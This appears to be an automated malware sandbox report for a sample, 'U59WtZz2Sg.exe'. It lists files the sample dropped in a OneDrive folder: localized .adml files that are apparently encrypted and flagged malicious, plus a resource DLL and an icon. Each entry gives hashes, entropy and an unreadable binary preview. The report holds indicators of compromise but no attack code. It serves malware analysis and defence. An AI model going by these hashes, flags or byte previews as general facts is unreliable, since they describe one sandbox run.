SSDEEP:	768:bI+qto9fJm+WZ+bYsx7WqHjsX34ymZ7UX4e6+Pwp5H2Pg3xfd//cyP3WXMW+eVM:bIjto9fJmTZpX3AZIXmH2odsyP3DeO
MD5:	113630EF329B7A8021C6F63F0DC1A415
SHA1:	188C615422B0DA0FBE4AD8884F9CDFF0F977273A
SHA-256:	B56052B10B63CA22661AF22BA888EC3AC5F2ABBC2B82BD2B646C18D4CFB99044
SHA-512:	4704B0EF08AA418A8B589AF6C2520783F81ECE76DB3EF42B221F553D30DFC3BABBBA45928864958DACCF2C8C26483EA5DF594D611824F4A227D08C3F24FE3A92
Malicious:	true
Reputation:	unknown
Preview:	<?xmlB..uvf..\...%...F.G.~8..y...3....q......M...."..[..]....V...Qc..v0.ZqE,\|7.x...N...u......./..Xh~e......>..z..{H.ayX.P._k+.:Q....h.]....w7.2.I....@..6s.'G..3W...-./...pC..l.J5.C.}9..g..=.>...}.O....X......i.O0...}Z9+%.;.\.....IPi.{.E...F..........K$.)...X..<....9......3"....#u.<...A.FhZ.....43W.B.........x.?.....e?X...(.B[N...G.....V....h...[..%.......s......$!G...q.GD..i.}....k".~t....X%..( 1ME.......S.P.)...e..+.......0...0.2..O.L..t.....!..x..@lz.3k...+...=....j.t.KP%..v...S.x...l_..':..o._...F.....d.}I......j.{..D........g@.L.S~P.v..'M@E.."..!.....~......7.zX...bU."EXe<Sc.$Q....K)....W.......aq...)...^.T..>.U....\|.....H.....5Y..M.n............9....lD:.c..P...O.ppo._.,.ILb.:.>..I2.......f}v$.z.%..A...X!7....)7...+..VNS.)........T.. ....{.r.5O..~........:.)...Vi....99.U.$<..........d...1.ME]t."..................c,-....\...bE.BG.....p..P:N..= .........9.7..H.RS.l.4I>~..@......\...../.(...Yi.7s...h....Q..B..?.V..;f.}k....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\ja\OneDrive.adml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	47156
Entropy (8bit):	7.995951386565418
Encrypted:	true
SSDEEP:	768:fO9h0oiDKtkj/R08K9w/cXX3l+wvqW298xmOlnLq99jy5f1oe++rKRyNM:G9h0fK2LR694cHV+mW8sQu99+5f1M+r0
MD5:	DE45B1E7643D9A8755BA48936153ED0A
SHA1:	05FB6B36BF26E2D45E5527BE12CD00E3E8354DC0
SHA-256:	1421AE54A5A15F9908D7E594BBF0D48DD9ED514F30E158F45E2476CB7116F701
SHA-512:	D275D9D466FC2FCE5E96A82A3002F5810298BC8428D02A88F972D186CA97E933E5C0AE749E3944C896D495834201F9438F870AD1C0377D45FB7D9CC5F7EF9592
Malicious:	true
Reputation:	unknown
Preview:	<?xml.f....pA.J...$.+.\|X:u..~_.w.....:.p...?...(..i..R...0..(%....m.n.....CL...?.8.LB.l'...I.....0.."....!.b.<..z\....S..-.!......9n..`...J..K.......9x.c...q..7.J.s.....x.`=.n.E-9.-..$f}bI.g.;....2........H4.!!./..>.2@....L...<.QR6..O.7.............Vs&......?..f....x..e\).&..Y...V.Q\I..:.....9..........Z......HXj....r.{...[d....6....@..K>....o...%8t..u...;......^......x...NX....q!.4.6.l.9..+ .zL.z..V.P....e..s..TZ+TzX.<..)o.....'..Q-..._.n.M..JWHB.f...M..Ft..V..1O}.Se..........w..V.Ob4^[Kb.[k......./....."g.....i..V.I}.....k`.e.../.5.9wRcHw.UV.i.......%.o...\.\|.....P...9.......>kIa"...G.T..... -1\|J..e..A.-m..DB.^=......`.<.uAPCp..Z...V.R;.l.xD..u..C.l..qn..@..n............0.G...#y6.!"...y#.Y/c.PR.g.p...1..)..[=..h.A.]!).H...LHVo....M.gEi./.....U.H.N\|.D.......k".....q..-..>.U.r.-G!..!..b...d.Z.{..[..`...."..0..x...i......,...:..b...J..g.<.w.N.....>+...b.5.@..U... ?.p..rFQ.JH=..]..0..+?..3..o._...z.F..e.J.......j..ev......

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\ko\OneDrive.adml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	42004
Entropy (8bit):	7.995740273674273
Encrypted:	true
SSDEEP:	768:iOsqp72350V0m8SHgusv0ZBORTcwnWy/bYRtpJCUGHx40dqgJE:iOzp7y0V0bupWPnDI3JCUGHOD
MD5:	9503AC48C89B405959029685F6E2B46A
SHA1:	E245BF80BC700D1EAA3CCA006626FB9F6175594B
SHA-256:	ACD7B697A16E6794FF28B7AE13FF17EDAE006663114F7F575AFCC31FC60255E8
SHA-512:	FE225FCA52A683226874C38BC4A17AD30D8CC618FE6D944FFAA5750C98DFF9D046BF80CE9A38080D3DD32C97C2B0FA1F144B6979838B8839D54642564B372F98
Malicious:	true
Reputation:	unknown
Preview:	<?xml.....&..1.k.8A..k.w.D....m....I....x.l..}.!7@...U..).0...P......Pa.K.....H.2..a=^..X.&{.rA`.h.9.LK....tJ~.ZC.'.C...9.....Nq.`bS@...l..$.:.n..L ....~D...(E.........}......n...&...@../..p.u/).?V.......~..\S7.1.vn.9...).^.k..n.......z1..5:..n.j.b.Q.J.....E.c..C&.......#..<....)....]..(.B....-.VB.v.U.'r<^.."N...K.1..q..v...e.f......p.I........C......;.\...?.I.R..?a..}N...\|....^i...]V....sxUK.....O.........w^.9.a.....j.!.H!J.5..W....{i.8..~..{}K.......S..E&..z.4].o..o;.>.. gVs.t...u..#..Q,.>...;u.O#....MV...S...h..O..1.C..X&.i.d...........7%U.x.K....?C...h..)..\|.v:....:9......./.......p.A..4.5b...o....."..e...6s.;..%.h.b.vQx.....&..+20me.....^...G[x.^.P....k.IT.$.9/k..3..F.0..#./..]..8...>.WODj.Y:M.L..Y.:e=...Q.....Ua...Ea.4+.<9R.x......( ..L..NT@(.......%;.....XE?l...>$~.._....bM.8.D.>.._.....4.....5L.x...Y.........\|[.........z\|.....x.).B.. t....?=....H{3....S.w..}m.....G..X..N.Xn...-.r.#/..H/.....M).e.....Q..\~..q!U...y."Lc.....G.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\nl\OneDrive.adml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	41892
Entropy (8bit):	7.995234559895244
Encrypted:	true
SSDEEP:	768:cxsmko/LYBB5ISj7dkw7algJGmz9lpNTJ+hp6eYAmVEs2wapu3iO:Msmr/Klj757xvzzleYbYjU3z
MD5:	BA0AC0DF595967114B537671B96C4247
SHA1:	260B21463AC772894A89F5031BCEDA519B3140BA
SHA-256:	91885473FC28ECFDF822869FD253C0F226CCFAA491472DF12808736319A133DC
SHA-512:	A8C8836CC1476D80E9DBF15ACC606B1855286E36BDC9C7773584683BE1260B990BD536C3163A77E4115B6952FDABD52AC1753F139FEECB6F40F54EBEF913843B
Malicious:	true
Reputation:	unknown
Preview:	<?xml....>.......e...n...A.{B.814.C~.D....Z...x..\%.WWN....m..UE..M5.K.T0....f@4.....k..;Y..nb.d9.q...g..2OS."..F..x...&AV.d\|.N.2..78.@...[..X.........-.&.B.e..F.Qn.Cw..k../T..E^6.e.. .]...N.....Tld....R.{..<%;........+o..o...88$....)}.#o..D.u.i.l..@..b....D.@..(......;.'}XC.a....o.Yt....S0^...ooD._....K...-..<........l.n(d.\.j8....R...b.....$.$.?.......M.f.#E.5w.h..f.../.Fx..9L.......>.....+.. . .p...L.(...".....`.?...X..P.,a.z. ..xC..@P..p}._.f.ZQ....]}\|.C../.U..$\|.....r\..!.H...`o.z<&.8...@:..z..#.S..K6d..Mt.>.n...r=4.+y.G$....\...d....x.:.\>...e.'V..6..m..).X...JI./...'%.....gH...:...%dks.!8........>.......0..;........@...h..yi....l.t.=s...C...l..S.g(. ...f. .O.......z.Wq...i^.?pr}.......hN..(\...1+..H._.z.....;.... /jl.*.....Q.O.8..Q%.X.a\|..N0.5T)...@...s..a..$9.E=....6)\|....}.rP2...Y.r..L./....9.....!....90M.).&....`..`.m..V!.g...qG...u...k2.).6. .(tX\|..d&$3-\|.Lt.....#e.........e.p.\^Ss.Ip..7t....T.y...K>...=R....K.,$).V

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\pl\OneDrive.adml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	43847
Entropy (8bit):	7.995976466393452
Encrypted:	true
SSDEEP:	768:A2zSY9Ja7t3BLuUFFy9bMSfRM2zM6+NphGvCIym64kSUrUr9QOUVGumY0DypRlOh:X947TbFFy9bMSfq2A6CAvC6NK4r9QO4u
MD5:	590F46D90E8E6C8C85B5D8A628000D4D
SHA1:	1D911A8484E9D6B756747F4363E845FF5BF6F3E8
SHA-256:	B18F36471D46949F06F410EB80F7095698E0D3528FBB37AE5C91D3CF791A1AC0
SHA-512:	15A532E03C094E92676A9EE54BA3030A0007EE0595F802CBEFA8F99DF05274858B37D4397DCA2D4FA8E2C4DEA708259C9D4A9007C176BBB457E08A6AED658BDB
Malicious:	true
Reputation:	unknown
Preview:	<?xml:..p.....Y.L..+.)... ..z....a...C.....\.g..~..)..9........C:Lb..O..J..^....p......k<.?....]..+[..0.r.X[<UhK.)r..2.,.mJ......../P.6!.j.............c.c.....Y.g..\|3V....0u./..9t.2 .>.S.m..Hp...X.y......B.......\.........-.Z.+s.[Br@.b...~.\Pjrp.T..q..B ..\|..........[...Vq.%.....J.D.......s...-3?...&Q............I.......H....&.6..9.p...)Z.t.].m}pS.f.%....N..$......k.q....]m.l~7...J[-.n.G..........`\a....-...:M'...g.R..+d..d.5!S5.~./Y.$..s....5...._W..o...~.\...u..N&{e.0....d..o!o8...2.r...D.^.t.7.G...9]Fd..Q.G.X.}B`..~.m.u\|w..`......dlN .......Q._...[4..U.{...r.l.Q..s=.....`...q..y.{nw..I.q..R...X..........2......q.r.Z..M..68...!._D.V......q......\..w?Q..a(.0d>.S"..#..,.d9.wG.....'.k{.W9Y..6..@.Ap.....{.,.^......UJ~.K....R..@.E..[...fvC3......j.B..[.3 ..x.&.fQ...B..=..?{X..\|..d...[.+?..M.D,n.3.......P.X.O8..(J&D..*.Jd3.q..W....<..<S.%D&..r....a....[....%.c..r.\kl&/.......M.P.4/.._.-;....K.9..$..C.5..J.1...W'......P.e...h..-.fz(...H!...e.l.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\pt-BR\OneDrive.adml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	42602
Entropy (8bit):	7.996028109983973
Encrypted:	true
SSDEEP:	768:sC3R85MLGlVShoqN7kBxanNx0Vw+GJM+e+cugPHMBJxtc+C2l5hwUz9Cwpj1fs/a:s6RRGLShoqOBIf+zGJM+ePdsjxtcF2lD
MD5:	242C93023A2C5BCA38BC0F26A64522F7
SHA1:	CFB8CE9E211C6602E07FC7D818337FC840155EF4
SHA-256:	D70308074F971BAFB5C61395DD9BA8DB613F22F0589971FF3F21B45DDE8976E1
SHA-512:	57713934A15440CC934DB3A6D0B782F47971617182DE43C706BC7DFF3E1F0E4D1268207DF8B30B85C2A3C140C257109B91DE99B130FE78ED69E33C44715A170A
Malicious:	true
Reputation:	unknown
Preview:	<?xmlFb.u..J.S.8..\|@ j~..../9.....g...b.....H.%.k.iq....i<.....q.~j......F=..P.WQ...._^.".."].D.B.-e...{f..sZ.4.!0W'...YN. .p..~Z'..DP..3L...>..&..o...a.&..s._7%...l.Rh....0n..~.........0.XW.07........W...y7.#...Hs8:...TY.....F.........g.L..f........]6..?.:..?>..u.-\.@R.6+...<C..&#.z\|').v.!.C.k.#..'..H.^G..\.........3.p.}."u...<E....p .Z.w2......'....g.10...PGU$.XB..F......9b..W;#x.w..........d?.&.I.V?.Qd+....Bo..%.V.+.B....<.: ..{..d..<.'o..j84W.ES)..<.....V..Q.&.....q..U......G ..W.v...E,.+PI4...G..D..hJ.ZO../.B<.G/.....x..x.jX...B.....5.S].U~.u.m....o.....,M......k.C.u...Gz...,?....W........JKq.Z.e.W.#h....{.......:..;....\.'...K.j....{....6.m..cQ..t.$.3.'n+^..#.a..5......`?.K.%..!.........i<.z.l..7L=/...v...vU./I @.....Ye..dRC.u...f.X.9...gg...F..d?....2.....L;..D.6..6...<..z^5.t....ik...C.......h.#.,......vY_.....K...(..o...;3L...X...p.t!..%.@.\|.fd....x..Z..oHa..a ...>...#1M.P..1x.......3.x#....f...lX.y....N.t....M.](..i.y.^9..A>;*

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\pt-PT\OneDrive.adml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	43262
Entropy (8bit):	7.995060559401198
Encrypted:	true
SSDEEP:	768:xarNWkFDC+OAoCDBd1TqRRdyGVwy/irBqbVbLooRYxPyS9ihHlRwhB6ZrrT:gJC+OA1BdJCXya8rBqbVooRqZcGT0
MD5:	88CA684EF0750C6417806D4C74E7DDAF
SHA1:	ECD54B639E67ABAB5EB64B6806CA30C5F01C40F0
SHA-256:	2C418961F30D0592043651F99A85E9C8E32D44C6ABBA4829CB4C6309CA172152
SHA-512:	F99F540F56AF56454D279F6A6C76C26682CE16055580FEB46E7AE9E6F13B2A21E601620CA9B7CA402DF1F23643536BA5759E02A37147F9301FF95324170F93CB
Malicious:	true
Reputation:	unknown
Preview:	<?xml.<6.j...g...'............K........C.....vQ..k.+..u3.{a.g}.(...\..".T.O.<.k...)?.~.B...(.\|J\t.o.k.]....A..4...FK...\|..nt.n..@..%P..E6.. ..@..@...C4--.'..P.!.z..x..]#Xa#.D.66...z&.....a...N...`.!1N.d.ij....W.....!..Pc.4Q...RL.`C3!.}Q..B.)..D.8..ww..A....gk.7y:..I$~.ZH.K.C.EL=...^F...g.8#...@...KYi..Qt.P....i.....;..U...nJ.j.-VB.D..2... V...i.......7.....3T.{.........H..5[q6.....?......g...;N..].\|Qo=.J.Q...o..u.....e!..H.Y=..M..ffeH..JS..8WdX.$.....1.T....@.K..r^...]g........XU=.p..k...4..."LW..?......al.H?+_.._ixd.sR......[z}./.t....h.8P...1.....+....1...r..........ZlH.7...Wz.1\u>r.7{...y.~.?\.eu.F.L.?u..Jp.Pg_W.O.. ..g)..U.....8.LvZ.gx.v..><...u......!.......+O..c...;...;..K..h....C..u.GQv...%....}.D.....:....=.@#d5.u.. ......%3.~[`....R>sW.F...xL.o..z;LZ]..)....8q&3.\|M.X....'0...+......Q..>.s..2sc\|8.0.9k..T.`.9.'.EE>N.].....\|0"9e1..V>.%...$...Y0..sNb.......c.7..fk.....6..'..b5:.r..".....C5.......$.Xtj..4U.<o>....#..uf.a.uuO.~Q..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\ru\OneDrive.adml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	63571
Entropy (8bit):	7.9969298348656475
Encrypted:	true
SSDEEP:	1536:2Ycg0dcVvfQ7fLlhr+W+0xswLGFgbCPECq4v/3g5nBAtXEwqQ:2Y5UfLRFt+0xswCFgesno/Q5BSfqQ
MD5:	A60332B39C69A1A4D6486E108D73C333
SHA1:	B843EBAF8DBF43A27BB787B3F066EEB37B1CC8F5
SHA-256:	FBFA217AF56C7B7D466D5ADCCB3358302381F2E490F50B7E1A22355DC3FE83B2
SHA-512:	8E14DC5360EABE82FFD8DDD5818AF1F7B703CA22E41F9AAB5E4C1191E0F00CAC7010C915F168F8B7FDF57153690A310D1FA38801091B06D3DD12D6DCB66FA10D
Malicious:	true
Reputation:	unknown
Preview:	<?xml[.`w...f~g.....R3..].N.g.+`.....5..,.....#`.........5..Q..b...kT..[s...3.:.U....9.t.F:.nT..b.w....RP."...{kl...`..Y=C...P)..2lC./..o.Kn.o2........yD.....c...Fg...,.b.4..?1\|r...n.....nb..5.g&..=.......L"..+R..f.m.=.......As]..y../T1... ..o...O...Jv.....D..]D.....z.:.k....(.qj.......g:....Q......de../`I..^.+.x.<..$.'.'K..A..6..~"r.uN......R.C...b.<.$x..rv...T....f.'..~,......b.......4....X.W....0r.1_\|...&g..+.........c.R.T..F............y..$.e`...........X...L.81(.de......h....=......@........<.c@.?>.^..n...!.Zc....=0...~..=N#/..O.d.@.............e0\.A...Un8+X(Yc...ZX.........WA...d...P....u..<C(...X.....;.N./S.1......6.5...Hm~w`v../..$..........`l..}......}..........RJj.Er.2.Rt..H+.P..o<.....]YCi.5.8...].d..jD.X..\|w._.P)..p.ci.8B'b.%l).b...<......!"..os.......e...&....].=.V....(.o.\.9.{.B;Y.8(i.~.R.AT)...?.v.}{fx\..X....A.ve....7...1>~.GM..\|.?.....-.._. .;wd...I],.?........V...0.....8.9.%...Y.....9\....W..A...:..9...~.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\sv\OneDrive.adml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	40592
Entropy (8bit):	7.995247541131802
Encrypted:	true
SSDEEP:	768:XYSwZQwdVnvv14952aRATUYTev5t8+dQGFL6aJ/FPs6utYPxKcQwgTnBXvpp:XYvX7w2AATUYT/GFLRDPst+xKcQtX7
MD5:	A4574FE62426F947DF5703B16103B945
SHA1:	EB86E5059F3E7326A082349566517EC0108E83AD
SHA-256:	22A455A90380C87B780F0B2FFB2AEF145BD7ECF192A17BA939BD7882F654D91D
SHA-512:	7B0C199F6DA99428F150D38E14E2F7659633025E5DCC24A9C473C9028B86EA2C080856605190C2658FE5E691E127263546C26E1610E9BAAC8AE23750FF3673AD
Malicious:	true
Reputation:	unknown
Preview:	<?xml......_..2.Cs.&.z'.{x.....6'.x.C.....jW..J....<..!r..C.l/.].W.[....eb.s....E-....h.-.m..:.ZH....0....A..Z..uZ3.....q.K}....C.WL.....u."\....W.LO.2^.BD....\|U.......m....Z.........1AkM,.Y.e........c...M#IH.C.S...`..\M..'.\...i......j...VP.T\.'.,.b.Q..1s......yB..//.......&.'.....r..6n..>@....RI~a2.M.3..&...qu..s.y.....M.......u..c.I.eH.......S...\|YF..1.VK.F......]Q...6[..#c:P........LH.Kf.2.C/\|)_.Z.qJ. U.....>.>Kj ......h..VY].n...g..r..f..'Q......un.N.'..7&W....7.......&$....!.......T`..j.a.%T.+..8.........V..l.....Z....(E.V{._.9.M.n.>.XqD..s4.w..0...B.'N...].q..g.0...1...t..B..G.V...E."H.A.v!>O..&.5b.09..4.5..#..'.P..o.J...{x.n.............a.m..([~..G.....'.Wq.\07....;R.v..\|..d....2......Y....$!..Z..*;.Z..8.y"0Z.+.v.n.5\|n..-.l..."5..dhk'..$..:.2..!......\|f..t.aRq...S.Q.g.....P.".E.lt..tU.Md.dn'.&..>...hF.w(.C.&..........r.....@.Mq.Y...L:u.<ysO....X.O].G+.g.Y........w..._...F.8...2K.....R...^.9.X\|.>...lX#.q;..r.jd..$....I........RD..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\tr\OneDrive.adml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	41058
Entropy (8bit):	7.996060120223267
Encrypted:	true
SSDEEP:	768:FPMbJtJ6tCdmPb/fhf9D8sFqcqPFFrOm3daCT8U4Fih+q53UpIhyZgWnXXuvhkW:GJ6S4/fhfKBJPFF3t1hFhUu+gWn2kW
MD5:	A62CA20885780E6C7706C065620E42B4
SHA1:	EC1CB0B270DF1F9401F7D872E7E3E313154591B8
SHA-256:	FCCC682DD69A56DEA01BB9361FDF26BB3F0F8DBD66250F0EB02CD56F78F86E49
SHA-512:	3067BAD1F0CF9CE067B5DE0E72521164D0E6097D143172AAC23C8608569C8BB6FAB5EE1F6A05E41FBC310D0C70C86004088EB7F29782AEE91E31D5523A71B67F
Malicious:	true
Reputation:	unknown
Preview:	<?xmlW...v...h..EU?....T.O.`...o....,.ww,...\A2...'q..C...I.1.W.N....5w..I,.......V.dx?.2).\k.#..D..I..H...@.r.......}.....FF..'......F.i..\.zyUV..Mx7....v....Q.z...9....'.I2.$H..&..aOM:5.G...([{.p2\(.O.B.....Z]..Y?5......+.u... E..k.O.w..fU..0....4..........2...F.S..67..Ky.KL....Z.6.>...6.I.V.l`/..~w.HC......+.Rs.O.@..O...+8H.S-r.w........jjC#..z..E...m0.-.F.....qAn>.g^.6....\. i.9.j..@....s..............=......cI.4...B......,Z.tp...V69..Y...D...W5=..1W...^..z>v.j........i;.f g3l.1..I.U.R.8.^.......~....2....s......[53.DO..B...."g....=.a.TlS)}.l..u.5}....B.......p.C.............G.l.~.3..7..:D.......^.......2..b.0M..6..^us(.+&..(.#.7?..wM..U.E.2....`.<]......xY..ty6Y!c.Y.K.,'.,'.4.0d..H.......p..n..;...\|.O..B...R...I5....PB....Q.K~;...w.Y.i.p..0....p.Env..q....s..pGF.7..u.:.....QN...gE....p....$.K.......m.D........R....N.....L..b.o..M...S'..G.m..a...0.i../../f3.:55.../.0j...V.V\|.e.l_.$...N..^.o..P......v;..eU~.\..!D.g./.p?N.9g.V..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\zh-CN\OneDrive.adml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	32665
Entropy (8bit):	7.994812561708311
Encrypted:	true
SSDEEP:	768:y4YIZDylLYPP2TOtQMBc58OQniGcmy9CA6XWbO0aZVour0N:yWZFgOri58Xam2LOTLour0N
MD5:	0DD3FACB76438FE2E2E500C2FAAFA6E6
SHA1:	B97A8E7A1B163B969F51F6F8B95E4FC9146F54C7
SHA-256:	824A51FEAEFD5123BFF7E02542FA0A80C8C4640C2FB909C3BB48A874DB8E78C2
SHA-512:	D7277C2ADFE0A91CF661CFE74800AF89A882FDF2B0E67729F882769BD26705E975151D2067486C7EB2AD09F717F5899C60ADA1F5AFF383239481E9903BD32FFF
Malicious:	true
Reputation:	unknown
Preview:	<?xml._)H........F.}.3.G...V..6.....F@.Dm...l.....C<...[.......k.$..JT.:......]6....PI.6...M....<.rg...3.o-.\|p....z...w....X. +....M...r$..x.X.uT;+h.%...sI...oM..~?...X..R.`... r..JT+.n.7;e.M.]...UE..G.(..`..o....%o."...W....Q.0U....K.B....Gw.#]z...A......i..Y...t.az...GeU.A\h...C~;j.....dpF7.WEZ.F..^..b^..x.rc...\n..4g.0.sY..]M....I..v$..n."..I.,K)..ax.7..p..(0...CA.5......r..s..m....@..H.h)Y...&......C.=.......&...a..6..-....+d..w..O...P.>Qu....,..!....TQ....+....Ep...cJg.OP...@....8/.A.8-ND..d.7..6...g.}.Q.t..-,h........jSB..tA...m.e..Sf..y..Z.@...._.W.M."..#Q..W....\.(...I..../.\|kK...4.49.<.E".{2........A.g.O......h.#H..'.zTR9.Q.?.Cj)........z..>.l.;.^.^..7.k......e.......".QV{[Wxo._i...K..y..]E.\)s...b.A.o.}X...y.....]QH.o....._..9....p.9j./5;.Y...*....u-T$;.5,...?I.=.6.....o.. .\..s.s..&....p<..h...[.4h..#8bj.)wE..a....:~6).e.{o..g.L....G.9.-.}-....gY...`5lM:...."....~&,..7......P...H.....\.!.M...\|D.w....dO...UM6.ZR.u. ...=...}..x.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\zh-TW\OneDrive.adml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	33921
Entropy (8bit):	7.994258274322427
Encrypted:	true
SSDEEP:	768:CEG2rxyOe+hQHknkUzD0dGQBPGZvP7y2IjJdDxnZrRpZiH:IHz+nkUH0dNB+l7yfjJdl5kH
MD5:	0F7BAE8CBB596903716DCABC86394537
SHA1:	951BEC43B8D0592DFD944CD4B5B6398AB7EB672F
SHA-256:	52DB0932F1294EEC8C1F6B5E069F4BA6ADEA58542EEC8C14F4597A7E88D141F9
SHA-512:	21C1DE54EED96DD692DFD25CB6EAB56E37268105FAF553B81EF399F27D287F6F9F1A74E4D69949EC672239EAE0C0DFBA6582CAF3C757C4FC9720981ECE3A0E7C
Malicious:	true
Reputation:	unknown
Preview:	<?xml:........}h^r...L.C>.C.8.pw.y..W...W......N..+i...!....N..D...n..@.G.&}.h...\....&....Q-}...........[......=.....~1.....^t.-.K..6;..h@..6.\|....6!.9c...Ho.=..?.nk..(.be..L.d5.....6.<..^.Kw..U......c{z.!...xo.30.UD]+x...>..l..j.p.C.W...?~l.L.Gi.....ZkU..T.x.h.=.2.%........Y<.y..ye..ff.....1....^.2....[./.....8.).....OK.-...gU..4__..b......1\.C4.-2..b......:..j...U..Ze..s....hx.E..[....'..O..G.+...6X..F...%..UG.7..l.l..H.m..F...hX.......?........ ....._}..O`..D..H..K....m..Y#5x.=.BV.....`*.....i.=#...2>]_.....r..9s ..w.[i#W..;...3US..x.0ls..N1]k6d...2.G..4... .....D..Z.@...+....\|T.a=..DW.T..._..vzs.~..LE.....?.C..9.`...#.K).5r.....M.%.61.....\|Q..cCm......O'..." .P...\|j....a.&...(.e.....h....`v.l.O....D.R$C....O.v..d;9r.x.^x...}a..8}./..9-.'..4.2M......@..O.#,....8..K..$.w^..=...# ...ya..K=KT..cp..]2.....#..B.k.....40.F..pU.z!..u.t..xj.L..O.Of.H._..l.'......=Q.......nf.R.\|Y...6.T.<......o....e\|v...Tx...i..9.L:KQ......o2.G..8..#....m.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\af\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	198790
Entropy (8bit):	7.700912293386405
Encrypted:	false
SSDEEP:	3072:3KIxowG/1U6DC+ELY6xB2lCnBU8i1QFyhd86sZKq9EdV29hA:tsOsnlc9FU86sZKMEd4A
MD5:	77B9A45985042C2552F7BD9EFAB8E604
SHA1:	85A39C5605816C047B8C403DFC304EE6E3647F5B
SHA-256:	D8793DD8ED75BA9365E9DB3311446813F2C85FC91CB2CD9A7EA10F3CF2E54750
SHA-512:	5E6B1C0655FBFC3680748DEF829242DEF9EADC7213BF1EBA7FE4047D4EF08D82AC855B98C99666FE5FDE6D54C0E23F8969F39205331B8AB69F8A850E298F7DBE
Malicious:	false
Reputation:	unknown
Preview:	MZ....ql..;.\.}.R-.&.9P#.-.h!t"..\q..VlO.....V.yM/..2'. .d,.3.9..@.$B....;Q`Z..P..^..d.E=V.t...d./#..gk..\^...<$.C.n0.}$.7..".. ..C..]Td..}.....T.O.\|a.4......g.^jy........ZEXZ....wS...,G...6.....)..J..4....&......8...)..c9&`....6...^U-.Ib..d.eY......y.."...!!......$.5.....H.$.k\.O.W.I..(...g.k..'.G#~......j.U..){u}.z... .V}{p..\|.E.Qj..*i.[e.9K.~.,.T.-.....8.+`f-.70.c;[/;F.. ......u......Y'gL....t<i6..R.8`-.....,.o. g#. H.R.u.a.^...3..)...0W#..........{.ty."vF..Q..f.F.ja.{...x'".,E..%..S...M....bk.qK.9..\|.....i.Y...]P.;.\|.w..wCp.F...q..\.H....;......Q.j...........9._eGp..i...........l.\....T.}.`....>..W57.O.A.<.ZZ...v.....y)x2O.~7.u2..........@..3.L_.....A..UI..x...#.......p)./d....L%.^.L.a.?..X..<vi..u....7...+..7.?...D...............@.~..`0jj.W-..>%..X..CF3T+.H..vl.@`.s..S...[?...p.x.M......\...<..A...1......d;....]q.h...b...iW.&zd.,........?...A..=......j'.W..S.Uw.......f..3....?d.)0..j.GI..&.'.DY2-.. ...S..F...4.A..F6.3...=8.n...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\alertIcon.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1052
Entropy (8bit):	7.810091904581177
Encrypted:	false
SSDEEP:	24:roDy+JYfHD3NepTDom3lnkjhuiubL2lA/7VYAkXegfIepGcrv7roOxbD:reJqHD3NEjkwiW2E7VY5XegAevXrThD
MD5:	08F90C3B1FD15F445DB3370C2FEC9AC7
SHA1:	C6ADD9A9BB25FC6BD96E77EDEB5F96BA3F136382
SHA-256:	695D0043202C4FEC93AD331DC03FCE90582052EE95CF86EBC32C30AE04F53A93
SHA-512:	1451145B6941D4AC481CAF06BDE8B12390E6AE6ECFB145492B0F311616B6ABC13681E0C2E1DE3473F51394FF9967F2F878F787153AC5A363BB15B9A9E0041DF3
Malicious:	false
Reputation:	unknown
Preview:	.PNG...7...qt.,....M.8.[.D....C..#...?..L.f.V.........7.(..Pt...AqU;...@..9..:.o.9.&U.X<.mW...?....._.z.U...J.././_...C....$&.S.....:.c...z ..DbN.d`....@....,l5.....2#...I$.,.. S..E&o]7...p.C.F....v.da.-F...2.;u.S ....q..s%,..Cl........4...:bMn..t.g.A3]...j.....u0..6..).@..r=.[..i.m.K.......S..m@..7'.RM.&.......,.S. ....j....I5QI..<.?9.....6"`w......8..l/..../~...?.#.X._....P.....oU-NCA.~.;...f._.P.)....M..c..NYAW....H3..m................z...}1N.P\Y.}.{@.-...X....t..vg..a/...Z@...h%B.\|(..2.2.....k:.u.U.bz.fD.....u>ev..........K......<M.^.~.yb..ZF.]...WQ..{>...../.CI.4.[./u.a..L........`<}..A.p.8n....\|.....g.`...y..X.vi.. 